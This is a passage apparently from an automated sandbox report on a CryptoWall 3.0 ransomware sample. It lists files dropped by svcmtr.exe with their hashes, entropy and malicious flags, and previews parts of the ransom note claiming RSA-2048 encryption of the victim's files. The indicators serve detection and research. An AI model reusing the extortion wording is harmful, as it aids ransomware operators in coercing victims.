                                                                                                                          SSDEEP:768:GzmbR8Aoc2+m+coITqoe3y/PP/3YJoquQRScr9R:tbeAf2E2TLznPgJdAcr9R
                                                                                                                          MD5:6EAFB38303E2DF441788F1FCDD1047B7
                                                                                                                          SHA1:34FAC677422D33A79AEDA435868ACFD52D2B92CA
                                                                                                                          SHA-256:74A182B6A7B37C46249DB421DBA0D9EB83F6CE1FAF59DE1E445A97602688358B
                                                                                                                          SHA-512:D670E4EFBA88D1F31C14037194375D12D16A5CB862B6709E7D217E4A039956FEA937A02E54E1DA363702E72A967FDD0F58AFB71250C28A917653E9E0C8AA3821
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3966
                                                                                                                          Entropy (8bit):7.924079327722471
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgt3WhlBY629vF2K8+p6ZWvhSfKWs4CsAA2cEotYA1oBvhFP9sj8Tq42y:cztoDVB12CkiK3FjcEhzBKj8242X1Dg
                                                                                                                          MD5:40D25F675F7D05F5787C99A0D0993172
                                                                                                                          SHA1:8913379C416AC874D79E23E9DC7DB5DB765B908B
                                                                                                                          SHA-256:4CE82A1B4226BFE153EC2429219F361C272370CF737C5029A76DB792DABD796C
                                                                                                                          SHA-512:8E05B280A01D7F0A2E756FF24FF095D12ACA314A852CCE58948CC768D37932AF6E511C4750E694FE4800EE8AE2753DA6F8E63C17355B587316053B8995B2C536
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):34366
                                                                                                                          Entropy (8bit):7.993988451381542
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GZbXGPRYCZrmy5zlvzwOn64MN2SiPYGDTHd6XHM6sv:eSPefal8+Mgr96XHSv
                                                                                                                          MD5:71AD561C86C201C0762F2EB17188CEEF
                                                                                                                          SHA1:805D9720C79B5F7B47ABAA8A1D32BC4E75ADB198
                                                                                                                          SHA-256:EC4CE7277E0A6738CF725B779E55ADA122218CC820CF5697ED533863B23B4E08
                                                                                                                          SHA-512:C28859735ACE4D670E819272309E05EA12F0FF7F8642296EDF3373FB53ECC4158E4EC961F138ED0E82F3413263222711AFFC0988D22062319A24F16EA5FB3921
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):41598
                                                                                                                          Entropy (8bit):7.994576922557622
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GEVXqhw0a2i4ZYn5qq8BSYCAlXWdbQvgwnedaAxw4aDKyXwgbJgL+Zv4B+sqivc:LXq+0a54ZYnD8BVkleYdxoDKs8CG5Q
                                                                                                                          MD5:14699279B25BCBB2F7F7C842305B85BE
                                                                                                                          SHA1:DA9A9D8F65D3428B61E995BC54C561BE9AE81138
                                                                                                                          SHA-256:C40BE22C454C0F027921ECAFF8C8E7465A5F6890FEC39916338A58EB8C421965
                                                                                                                          SHA-512:09F78F2071E821892905B920D740DBB9CD0F24303AA2F5AB729A766341346A431A805F78B114A2B158FE245DFE7625A4F694EEB6824929E2BD01A72D2AE4EFA6
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):51070
                                                                                                                          Entropy (8bit):7.996071574801994
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:g3rYD1k6Fuu4xn4AuhBz/FeBQZOqGj0flF9q:+rP6FBOkBzwqZOHjqq
                                                                                                                          MD5:B85FA6A88332DBA57881071E10F6FCFF
                                                                                                                          SHA1:710C1DDA5D915A2A5D9546D3C0F682A117C43017
                                                                                                                          SHA-256:A1FFF3FD441E2CA6CA17FC388DF4D717A18775FD7B83C1D48505311CE1D06B95
                                                                                                                          SHA-512:0AC0768401E7C907FC3B8117C58967267DF2BC0B519B01F963613479D32A3C277A8B4987C8595394C8F89921DF9DEB44855ADAAD28A8D74284A075EBF62177A9
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):62942
                                                                                                                          Entropy (8bit):7.996155242321989
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:UVCuJvG/wfcd6wo+p4RaSUdMd3ezqpalnRye1IZUtN8S6/xiOsL:gJvGTQ1+bSUGyNnwe14Uz8SsiBL
                                                                                                                          MD5:C4185DB2B7A74FCEDD0EED8365EFBB24
                                                                                                                          SHA1:02F035A8A373DF0EEA1C566C6BF95CDEDD48C130
                                                                                                                          SHA-256:8E803D0DCBDECB4C9F932084851F7A1943CF2CBD3ED65F34D71819CEA9A7D11D
                                                                                                                          SHA-512:6362F60B3AEE1A603C4B826E0987B8888BE8D3C64890FF2BF45FFDCFBBBD59E29BB8EDD28F04801FBD8768BF39BF072DF4C228DEE38115380A32CFA5679E2A7B
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):15854
                                                                                                                          Entropy (8bit):7.985243727925691
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:GKI2KFAvckduUVeQamR03aoPQIraaUs94iWI4ESeM1:GKj5duc95mao0T
                                                                                                                          MD5:4C4BB99718C34179F774B3D018061AC1
                                                                                                                          SHA1:A3B6937255DAF5F245F49FE46AF6CD393639F164
                                                                                                                          SHA-256:FAE1C01AF495BAF39BC8A39D361AF32BE63B3E5890369AAFB495D0E2AEE0E9B5
                                                                                                                          SHA-512:A7373B5D430958422808762DF02EF473B11C1B0AA8E5762850C3E156C73973C52416029722B5B383C76615201B9A8C500B88DDEADAD9AD1212E611D97E74EF3C
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):31310
                                                                                                                          Entropy (8bit):7.993356148511954
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GyppzY6myIulwMwuB0nw8n03iMYXOLDXPhMfIWB50rzO/R6nV5AFIF:pPyyFwMwuZ2X+XZQf0ry/R6sK
                                                                                                                          MD5:565DB92BAE17399C6E430AC832143430
                                                                                                                          SHA1:D7AFEE4E26AC736AA0DEB370B6DC6C6BBE8C0E91
                                                                                                                          SHA-256:14D1C1530E8C96571533590A1441EF039994D69818E28D64A35425F7ECA2612C
                                                                                                                          SHA-512:38503DC1206C889D894615466139E7690CEBD82A7229041ABDB08F227AA0878FC8B817F78C641A25B173A167B30CE859D107823E4E90349E882FAFD10BF8A301
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):30206
                                                                                                                          Entropy (8bit):7.993040924253736
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GRW6WEljEiF8oGD23nLH9IeImzHufif8y7i+:yW9MdGDOnLH9VImzHuZ+
                                                                                                                          MD5:E5C457C67C88BB92AF8C2D3FF86D33B5
                                                                                                                          SHA1:62BF0D2799F4D41A9C6D5790C0E7FBD43FE854BA
                                                                                                                          SHA-256:3812458BD7042D86E80249FBF993A18338FDA24C544A30FD020022D27D91D6D9
                                                                                                                          SHA-512:268216D7338F7F43342FD1729E246D6740BDBEBB5DD56FF73F12463AEF264CF387E4CE41A5A6D692EF5A27D56962E07F8C19FAA66EEB2352BE37C5C24BE42CF7
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):42222
                                                                                                                          Entropy (8bit):7.995847055140499
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:G2zUf2yDvM9rd0Vd4UgEHZI7RaLfaZJr7f00K+9g40TjSTqwhzHJs7Ujpz56kfC+:fUf2jpdad4U7ZI7ReaDrDi+z0n3whzHl
                                                                                                                          MD5:78667ECC8B3D4C00AD23679F5B011DAE
                                                                                                                          SHA1:EC9A15A033104B68B5EDCAD5B4EE063790007416
                                                                                                                          SHA-256:3EE7DE5F603E0FED549E5099CB09B8DF7256A6F38DC85956A659B0894C5183B2
                                                                                                                          SHA-512:0DADBCD3E573AB5D7673631CBA8775FB2BED563A2ABFD918D374C4347577FFDCB5A97B13499A7D7F9A51FE5FDA2AAE5A1FFA59EB918CB466F10CD7A8924A539A
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):42478
                                                                                                                          Entropy (8bit):7.995839147716423
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GS3TTgqjmW+fTKokEWzdqpkFKeM56jIgqxHNGSW3e7+ElT3RVdb7JwR:B3fHmvrH3sq2swMb+9e+ElTB/FO
                                                                                                                          MD5:FBA4261E90510B5D3B48FF2997477F60
                                                                                                                          SHA1:AECB9F4F864F0E2F07DBFE78206317D3842EF3B7
                                                                                                                          SHA-256:7167EA340484A0E011BB2AB27FA4B19D4BAEC9583D861D6B64D4C115359B2DB1
                                                                                                                          SHA-512:F9D6F79C10FFCB29BE7CDDDD7337A240884B4036D6FF05AC1CB1B7E6813371BE31E4DDAF4B192AA648F330627D7EFEB5A911DD88DBF3E14AE637CC15F6DFC059
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):11598
                                                                                                                          Entropy (8bit):7.975732237540304
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Gou3d3Chz/Sp1QHL08Lnamj4Jz0Nr/X7Bksqn/gUfgc03azudGo5g65U4s:GzCQwHL0kUBAr7JOF0qQ5o
                                                                                                                          MD5:C690620335A60C48016F5C5ACA89FCDD
                                                                                                                          SHA1:FC04A2081A9BD48EF9A36B856CF2E2E36B3B193E
                                                                                                                          SHA-256:B27B8F986FB0CD161FD054AF9D77ED5C596739B662E08C1C4EAD55B75B3F8999
                                                                                                                          SHA-512:24EEB7F506E2F744E9C1EE43D88247141787369F3D0C8A6F6C63C37B48AEDC1D6B8900130727914A8B01E0C6C2831BEB46E585162E7669239FF37AD4CCDEC2B9
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...q\g.....<.....7.+...C..Fy.w.G..x.YTx....D.....5.'M..../..&..N..eet.....W.. .6.."...\....G.o..^Ez.J.&.....m./.N\R0.2......^.H..z2...0.C+...}....1..,FE.~S.h..A.m.q..%....b.'.....u..........x.}....R[........yU...~...(s..A....E../y|.T...]e..Gg..R)......'5.......V.M.s........M..P.F3.&...L6{9j^.....g..y@'e.i.?\.Y....a.]....o0.O.;..4.t.&X.."Q...l.......3^..kw..3y)..LN.. .?...C>....d..d..>.^..$.4.A.U.&>.....U..il.*.:..A.T.a.@p.Dt..On?...H.....0.N.Z..',Gw..dn1=QID..._......u.8Or.|s..d.. ......)."....k.S....'.s.p...p j!_i.#lt..]."...4....hwJn.C.W.s.G.#......>........).uZe.....
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):11598
                                                                                                                          Entropy (8bit):7.975732237540304
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Gou3d3Chz/Sp1QHL08Lnamj4Jz0Nr/X7Bksqn/gUfgc03azudGo5g65U4s:GzCQwHL0kUBAr7JOF0qQ5o
                                                                                                                          MD5:C690620335A60C48016F5C5ACA89FCDD
                                                                                                                          SHA1:FC04A2081A9BD48EF9A36B856CF2E2E36B3B193E
                                                                                                                          SHA-256:B27B8F986FB0CD161FD054AF9D77ED5C596739B662E08C1C4EAD55B75B3F8999
                                                                                                                          SHA-512:24EEB7F506E2F744E9C1EE43D88247141787369F3D0C8A6F6C63C37B48AEDC1D6B8900130727914A8B01E0C6C2831BEB46E585162E7669239FF37AD4CCDEC2B9
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):13246
                                                                                                                          Entropy (8bit):7.98130112234063
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GogS5jrU8FoVstrngO7An081AakP58rFHEEd5WqQJHHmYZ0DoPtLI:GbSJJkgS081JFk2AvJHGYZ08PtE
                                                                                                                          MD5:F0A6DF2161BC61D8E1973163D67F6138
                                                                                                                          SHA1:2F945624EF6B4769F5A84083931AE9E7CBE81292
                                                                                                                          SHA-256:633F5F1E96EC3BA044C48557C6F220998CE136F3C29FD5ACA53298888E0E477C
                                                                                                                          SHA-512:A2327BCF03111F4FDD811FC89C1E6ABADAD26ADDF2FBC7612CF2209FF0D0B1EA35EF2872440DD23C85407FFE0C30F1DCACC8F8EB9320E59750BFA2C7CEE1E66F
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):48974
                                                                                                                          Entropy (8bit):7.996378602046359
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GHiHTfSzHkCEw1/XjKvCAUF1X6MTyCUb9ijKM4mHSPKGR9vYzgeV4AikvMT5jv6t:7qzHkCj1mF6X7yCUb9ijKzmHSiiYzg4P
                                                                                                                          MD5:D39F8A1B4BD092092A903B544D70C0A7
                                                                                                                          SHA1:74FB03F9E035AD684BC972DD5BED3188CF231ACE
                                                                                                                          SHA-256:17CACC610A3172509956AE30AA3AE8F5E682DB04FCBEA2F06CE07672019AAF26
                                                                                                                          SHA-512:EA17DE62A98DF1D6ECD29BA63615263BDC6EDCB06DD4DB22673B2A408433EB836B5D7AD227842DED04003D660710EF74B55FF8A1E09159ED7C080C3B607972BE
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):25742
                                                                                                                          Entropy (8bit):7.991419317490656
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GWeV3Ho9TPi2mcdaVz24NhL83BklUHkx+2bSV:ReV4F1mcEF28IkkpV
                                                                                                                          MD5:0339132F2367D1D45D7692594961A26D
                                                                                                                          SHA1:ADA62838245E7948DD74731B0FEF44B3BD2324E3
                                                                                                                          SHA-256:4398B78F4FE4AD32AE264A9574A428A686C6AD76D8C039A64AB5B3D03D7610D4
                                                                                                                          SHA-512:5CB6AF1942F02C1BAD0629CE44BF42E99A2D793160A2F781D6DD773B5259F9F5780425B1DE2478C386EC5F53BE6E1A3AA2E9A04623308DBC6C0C6E8C64A5CE15
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):23502
                                                                                                                          Entropy (8bit):7.989597054483229
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:GfCSVIyvTR3mc29O2OT2D3NuH7CippPeIjaC4SS0BykpJXXiy48:G6SVfLR3mX9OvT2bWCwpmGaIS04aXZV
                                                                                                                          MD5:FFAE79CE613270080C108F60EDDF0AE4
                                                                                                                          SHA1:805E17C047FFD31A5AD56D49D178FB2EDF83F4D1
                                                                                                                          SHA-256:4F3C1E25D763EE4FCA3C0E6FE5B4EFBCBA4B80FAFFF04AC40B5BA953BC083C47
                                                                                                                          SHA-512:6F8C4CBFABCA069176C1696B6B9EC8A6E8C1F48743A6A600838922D6A6BE69B0B1F5288F39C1844194F6042C041DE7C3AD0637F4A4A1C38E002E4C3921A5BEED
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):10094
                                                                                                                          Entropy (8bit):7.977207486039188
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoIBQwADC5rmiqC/1eCRmcFHRcP/63rpfp8dWk/XhOBMbVZFLGFPWoy6Ta:GbBaCC1C/1+Q0635ig0GUCWPWa
                                                                                                                          MD5:5FFF05838B9F9A07F73DA39681857700
                                                                                                                          SHA1:3DC15E929918F9937C904AC49796392B5776ECD4
                                                                                                                          SHA-256:53939B17D2656A75AEEE16D950B15AF6AC4829213F74520642ED5EEB03BA11F1
                                                                                                                          SHA-512:CFCC2C61D8369913F2BDC6DDE483B372CB345615B39BB07BBAD285FF7A98A50941BFF4FB2DFF62969819F45231AE60D38577FB642D420229ADC25589CAD226DA
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):25230
                                                                                                                          Entropy (8bit):7.991879872767614
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GvgxbFvJrAxq9pFDVC2dU8HXMaluZPfDlro6112BklYe+:JbFBcxq9pBVC2dU8HXH0NDlzT7/+
                                                                                                                          MD5:7B72D09A507D34B8577EFA66F8EAFC29
                                                                                                                          SHA1:4991891BF7AE2D9B86429A27A73A5C7F378BB4F7
                                                                                                                          SHA-256:ECD930FA094626FA273BF22C86A56A4831BC088FDEC316BDED55CB329EC1F3EA
                                                                                                                          SHA-512:CF239D9E8E685BA35A63E15EC946830FC801DF7B39DB679728FC5ECD95EE6F0E6571C45A85DE8D06E4C5D3221796789F4F4221A49D8DCF956283CB5446F38E4C
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
